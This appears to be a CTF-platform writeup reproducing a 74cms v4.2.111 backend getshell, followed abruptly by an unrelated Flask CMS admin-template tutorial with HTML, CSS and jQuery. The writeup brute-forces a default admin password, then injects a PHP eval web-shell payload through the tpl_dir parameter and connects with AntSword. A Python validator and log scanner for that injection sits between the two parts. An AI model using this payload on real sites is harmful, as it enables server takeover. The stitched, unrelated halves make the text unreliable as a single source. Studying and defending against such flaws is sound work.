Knight CMS (骑士CMS) 01: 74cms v4.2.111 backend getshell vulnerability reproduction

Posted by 白塔河冲浪手


Challenge URL:

Youth CTF Training Platform (青少年CTF, formerly the Middle School CTF Platform)

Enter the environment

Scroll to the bottom of the page to check the site's CMS version

Search Baidu

Find a PoC and reproduce it: "74CMS v4.2.1 to v4.2.129 backend getshell", from FLy_鹏程万里's blog on CSDN

First open the site's backend at /index.php?m=admin&c=index&a=login

Entering the username aaa returns "administrator account does not exist"; try admin

So the account is presumably admin. It looks like the login is validated here; try brute-forcing the password

A 302 redirect means the login succeeded; the password is admin

In the backend, go to Tools => Style Templates => Available Templates and capture the request

GET /index.php?m=admin&c=tpl&a=set&tpl_dir=default HTTP/1.1
Host: 8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081/index.php?m=admin&c=tpl&a=index
Cookie: Hm_lvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664077379,1664087665,1664100554; Hm_lpvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664100567; td_cookie=1833576663; PHPSESSID=73nciph5rtj95ti9o99qd92781; think_language=zh-CN; think_template=default
Upgrade-Insecure-Requests: 1

Change the value of tpl_dir to

','a',eval($_POST['cmd']),'

Then visit /Application/Home/Conf/config.php

Connect with AntSword (蚁剑) and find the flag
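The writeup above works because the template switcher accepts whatever arrives in tpl_dir and lets it reach a PHP config file, so a value containing quotes and commas is never rejected. The following Python is an added example (not part of the original writeup or of 74cms) showing the two controls a defender would want: a validator that accepts only a plain directory name that actually exists in the template set, and a scan over access-log lines that flags template-switch requests whose tpl_dir is anything other than such a name. The log lines and the set of template directories are constructed for the example; the log format is a plain combined-style line.

```python
import re
from urllib.parse import urlsplit, parse_qs

# A template directory name is one path component: letters, digits, '_' or '-'.
# Quotes, commas, parentheses, slashes or dots have no place in a value that is
# written into a PHP config file.
SAFE_DIR_RE = re.compile(r'^[A-Za-z0-9_-]+$')


def is_safe_tpl_dir(value, available_dirs):
    """Accept tpl_dir only if it is a plain name AND one of the template
    directories the application ships (assumption: the handler can list them)."""
    return bool(SAFE_DIR_RE.match(value)) and value in available_dirs


# Extracts the request target from a combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_access_log(lines):
    """Return (line_number, decoded tpl_dir) for every admin template-switch
    request (m=admin&c=tpl&a=set) whose tpl_dir is not a plain directory name."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query)  # percent-decodes values
        if (query.get('m') != ['admin'] or query.get('c') != ['tpl']
                or query.get('a') != ['set']):
            continue
        for tpl_dir in query.get('tpl_dir', []):
            if not SAFE_DIR_RE.match(tpl_dir):
                findings.append((number, tpl_dir))
    return findings


# Constructed sample: a normal switch to the "default" template, a switch whose
# tpl_dir breaks out of a quoted string, and an unrelated login request.
LOG_LINES = [
    '10.0.0.5 - - [25/Sep/2022:10:02:13 +0800] "GET /index.php?m=admin&c=tpl&a=set&tpl_dir=default HTTP/1.1" 302 -',
    '10.0.0.5 - - [25/Sep/2022:10:02:40 +0800] "GET /index.php?m=admin&c=tpl&a=set&tpl_dir=%27%2C%27a%27%2C1%2C%27 HTTP/1.1" 302 -',
    '10.0.0.9 - - [25/Sep/2022:10:03:01 +0800] "GET /index.php?m=admin&c=index&a=login HTTP/1.1" 200 -',
]

TEMPLATE_DIRS = {'default', 'mobile'}  # constructed stand-in for the installed templates

if __name__ == '__main__':
    for number, value in scan_access_log(LOG_LINES):
        print(f'line {number}: suspicious tpl_dir {value!r}')
    for candidate in ('default', "','a',1,'", '../default'):
        print(f'{candidate!r}: allowed={is_safe_tpl_dir(candidate, TEMPLATE_DIRS)}')
```

The validator is deliberately a whitelist (pattern plus membership in the real template set) rather than a blacklist of dangerous characters; the log scan applies the same pattern after percent-decoding, which is what makes the encoded quote in the second line visible.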

 

 

Part 95: CMS system, rendering the CMS backend template

 

Define a macro for rendering static files so that only the filename has to be passed in; the "-" on the opening and closing tags strips the newlines that would otherwise appear around the URL in the rendered source.


{% macro static(filename) -%}
{{ url_for('static', filename=filename) }}
{%- endmacro %}


{% from 'common/_macros.html' import static %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
<script src="http://cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>
<link href="http://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
<script src="http://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="{{ static('css/cms/cms_base.css') }}">
<script src="{{ static('js/cms/cms_base.js') }}"></script>
</head>
<body>
<nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">CMS Admin System</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav navbar-right">
<li><a href="#">user<span>[Super Admin]</span></a></li>
<li><a href="#">Log out</a></li>
</ul>
<form class="navbar-form navbar-right">
<input type="text" class="form-control" placeholder="Search...">
</form>
</div>
</div>
</nav>

<div class="container-fluid">
<div class="row">
<div class="col-sm-3 col-md-2 sidebar">
<ul class="nav-sidebar">
<li class="unfold"><a href="#">Home</a></li>
<li class="profile-li">
<a href="#">Profile<span></span></a>
<ul class="subnav">
<li><a href="#">Profile info</a></li>
<li><a href="#">Change password</a></li>
<li><a href="#">Change email</a></li>
</ul>
</li>

<li class="nav-group post-manage"><a href="#">Post management</a></li>
<li class="comments-manage"><a href="#">Comment management</a></li>
<li class="board-manage"><a href="#">Board management</a></li>

<li class="nav-group user-manage"><a href="#">User management</a></li>
<li class="role-manage"><a href="#">Group management</a></li>

<li class="nav-group cmsuser-manage"><a href="#">CMS user management</a></li>
<li class="cmsrole-manage"><a href="#">CMS group management</a></li>
</ul>
</div>
<div class="col-sm-9 col-sm-offset-3 col-md-10 col-md-offset-2 main">
<h1>Title</h1>
<div class="main_content">
Main content
</div>
</div>
</div>
</div>
</body>
</html>
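To see what the "-" whitespace control in the static macro actually changes, and why the macro still finds url_for after being pulled in with {% from ... import ... %}, here is an added Python example (not code from the article or from Flask) that renders the macro with Jinja2 directly. The templates are constructed in memory; url_for is a stand-in for Flask's that only models the static endpoint, assumes files are served under /static/, and refuses names that would escape that tree.

```python
from jinja2 import Environment, DictLoader


def is_safe_static_name(filename):
    """Reject names that could escape the static directory (absolute paths,
    backslashes, '..' components). Flask's static handler performs its own
    check; this stand-in mirrors that intent so the example is self-contained."""
    if not filename or filename.startswith('/') or '\\' in filename:
        return False
    return '..' not in filename.split('/')


def url_for(endpoint, **values):
    """Minimal stand-in for Flask's url_for(): only the 'static' endpoint is
    modelled (assumption: static files are served under /static/)."""
    if endpoint != 'static':
        raise ValueError('only the static endpoint is modelled here')
    filename = values['filename']
    if not is_safe_static_name(filename):
        raise ValueError('refusing to build a URL outside /static/')
    return '/static/' + filename


# Constructed templates: the macro from the article, the same macro without
# whitespace control, and a one-line page that uses each of them.
TEMPLATES = {
    'common/_macros.html': (
        "{% macro static(filename) -%}\n"
        "{{ url_for('static', filename=filename) }}\n"
        "{%- endmacro %}\n"
    ),
    'common/_macros_loose.html': (
        "{% macro static(filename) %}\n"
        "{{ url_for('static', filename=filename) }}\n"
        "{% endmacro %}\n"
    ),
    'base.html': (
        "{% from 'common/_macros.html' import static %}"
        '<link rel="stylesheet" href="{{ static(\'css/cms/cms_base.css\') }}">'
    ),
    'base_loose.html': (
        "{% from 'common/_macros_loose.html' import static %}"
        '<link rel="stylesheet" href="{{ static(\'css/cms/cms_base.css\') }}">'
    ),
}

env = Environment(loader=DictLoader(TEMPLATES), autoescape=True)
# A template imported with {% from ... import ... %} does not see the caller's
# render context, so url_for has to be an Environment global. Flask registers
# it as one automatically; here it is done by hand.
env.globals['url_for'] = url_for


def render(name):
    """Render one of the constructed templates and return the HTML string."""
    return env.get_template(name).render()


if __name__ == '__main__':
    print(repr(render('base.html')))        # href is the bare URL
    print(repr(render('base_loose.html')))  # href carries a newline on each side
```

With the dashes the href attribute is exactly /static/css/cms/cms_base.css; without them the macro's body starts and ends with the newline around the url_for call and that newline is emitted inside the attribute value. Separately, the page template above loads jQuery and Bootstrap over plain http:// from a third-party CDN; a practitioner would serve those over https with Subresource Integrity, or ship them in the static tree through this same macro.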

css


/*
* Base structure
*/

/* Move down content because we have a fixed navbar that is 50px tall */
body {
padding-top: 50px;
overflow: hidden;
}

/*
* Global add-ons
*/

.sub-header {
padding-bottom: 10px;
border-bottom: 1px solid #eee;
}

/*
* Top navigation
* Hide default border to remove 1px line.
*/
.navbar-fixed-top {
border: 0;
}

/*
* Sidebar
*/

/* Hide for mobile, show later */
.sidebar {
display: none;
}
@media (min-width: 768px) {
.sidebar {
position: fixed;
top: 51px;
bottom: 0;
left: 0;
z-index: 1000;
display: block;
padding: 20px;
overflow-x: hidden;
overflow-y: auto; /* Scrollable contents if viewport is shorter than content. */
background-color: #363a47;
border-right: 1px solid #eee;
margin-top: -1px;
}
}

.nav-sidebar{
padding: 5px 0;
margin-left: -20px;
margin-right: -20px;
}

.nav-sidebar > li{
background: #494f60;
border-bottom: 1px solid #363a47;
border-top: 1px solid #666;
line-height: 35px;
}

.nav-sidebar > li > a {
background: #494f60;
color: #9b9fb1;
margin-left: 25px;
display: block;
}

.nav-sidebar > li a span{
float: right;
width: 10px;
height:10px;
border-style: solid;
border-color: #9b9fb1 #9b9fb1 transparent transparent;
border-width: 1px;
transform: rotate(45deg);
position: relative;
top: 10px;
margin-right: 10px;
}

.nav-sidebar > li > a:hover{
color: #fff;
background: #494f60;
text-decoration: none;
}

.nav-sidebar > li > .subnav{
display: none;
}

.nav-sidebar > li.unfold{
background: #494f60;
}

.nav-sidebar > li.unfold > .subnav{
display: block;
}

.nav-sidebar > li.unfold > a{
color: #db4055;
}

.nav-sidebar > li.unfold > a span{
transform: rotate(135deg);
top: 5px;
border-color: #db4055 #db4055 transparent transparent;
}

.subnav{
padding-left: 10px;
padding-right: 10px;
background: #363a47;
overflow: hidden;
}

.subnav li{
overflow: hidden;
margin-top: 10px;
line-height: 25px;
height: 25px;
}

.subnav li.active{
background: #db4055;
}

.subnav li a{
/*display: block;*/
color: #9b9fb1;
padding-left: 30px;
height:25px;
line-height: 25px;
}

.subnav li a:hover{
color: #fff;
}

.nav-group{
margin-top: 10px;
}


.main {
padding: 20px;
}
@media (min-width: 768px) {
.main {
padding-right: 40px;
padding-left: 40px;
}
}
.main .page-header {
margin-top: 0;
}


/*
* Placeholder dashboard ideas
*/

.placeholders {
margin-bottom: 30px;
text-align: center;
}
.placeholders h4 {
margin-bottom: 0;
}
.placeholder {
margin-bottom: 20px;
}
.placeholder img {
display: inline-block;
border-radius: 50%;
}

.main_content{
margin-top: 20px;
}



.top-group{
padding: 5px 10px;
border-radius: 2px;
background: #ecedf0;
overflow: hidden;
}

js


$(function () {
    // Clicking a top-level sidebar entry toggles its "unfold" state and folds its siblings.
    $('.nav-sidebar>li>a').click(function (event) {
        var that = $(this);
        // `that` is the <a> itself, so read its own href; the original looked for a
        // child <a>, which never exists, so "#" links were never intercepted.
        if (that.attr('href') == '#') {
            event.preventDefault();
        }
        if (that.parent().hasClass('unfold')) {
            that.parent().removeClass('unfold');
        } else {
            that.parent().addClass('unfold').siblings().removeClass('unfold');
        }
        console.log('coming....');
    });

    $('.nav-sidebar a').mouseleave(function () {
        $(this).css('text-decoration', 'none');
    });
});


$(function () {
    // Unfold (and, for the profile group, highlight) the sidebar entry that matches the current URL.
    var url = window.location.href;
    if (url.indexOf('profile') >= 0) {
        var profileLi = $('.profile-li');
        profileLi.addClass('unfold').siblings().removeClass('unfold');
        profileLi.children('.subnav').children().eq(0).addClass('active').siblings().removeClass('active');
    } else if (url.indexOf('resetpwd') >= 0) {
        var profileLi = $('.profile-li');
        profileLi.addClass('unfold').siblings().removeClass('unfold');
        profileLi.children('.subnav').children().eq(1).addClass('active').siblings().removeClass('active');
    } else if (url.indexOf('resetemail') >= 0) {
        var profileLi = $('.profile-li');
        profileLi.addClass('unfold').siblings().removeClass('unfold');
        profileLi.children('.subnav').children().eq(2).addClass('active').siblings().removeClass('active');
    } else if (url.indexOf('posts') >= 0) {
        var postManageLi = $('.post-manage');
        postManageLi.addClass('unfold').siblings().removeClass('unfold');
    } else if (url.indexOf('boards') >= 0) {
        var boardManageLi = $('.board-manage');
        boardManageLi.addClass('unfold').siblings().removeClass('unfold');
    } else if (url.indexOf('permissions') >= 0) {
        var permissionManageLi = $('.permission-manage');
        permissionManageLi.addClass('unfold').siblings().removeClass('unfold');
    } else if (url.indexOf('roles') >= 0) {
        var roleManageLi = $('.role-manage');
        roleManageLi.addClass('unfold').siblings().removeClass('unfold');
    } else if (url.indexOf('users') >= 0) {
        var userManageLi = $('.user-manage');
        userManageLi.addClass('unfold').siblings().removeClass('unfold');
    } else if (url.indexOf('cmsuser_manage') >= 0) {
        var cmsuserManageLi = $('.cmsuser-manage');
        cmsuserManageLi.addClass('unfold').siblings().removeClass('unfold');
    } else if (url.indexOf('cmsrole_manage') >= 0) {
        var cmsroleManageLi = $('.cmsrole-manage');
        cmsroleManageLi.addClass('unfold').siblings().removeClass('unfold');
    } else if (url.indexOf('comments') >= 0) {
        var commentsManageLi = $('.comments-manage');
        commentsManageLi.addClass('unfold').siblings().removeClass('unfold');
    }
});


 
